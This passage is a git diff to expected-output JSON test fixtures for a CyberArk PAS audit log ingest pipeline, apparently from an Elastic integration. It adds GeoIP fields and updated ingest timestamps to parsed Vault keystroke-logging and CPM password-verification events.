@@ -429,7 +483,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165109400Z", + "ingested": "2021-12-14T14:42:28.146632074Z", "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -452,17 +506,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -543,7 +615,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165114900Z", + "ingested": "2021-12-14T14:42:28.146632485Z", "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -566,17 +638,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -662,7 +752,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165120Z", + "ingested": "2021-12-14T14:42:28.146632882Z", "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", @@ -685,17 +775,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -781,7 +889,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165124200Z", + "ingested": "2021-12-14T14:42:28.146633288Z", "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or 
password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json index b2aec9f1215..16fbe87506e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json @@ -7,10 +7,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -93,7 +102,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193593200Z", + "ingested": "2021-12-14T14:42:29.505121135Z", "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
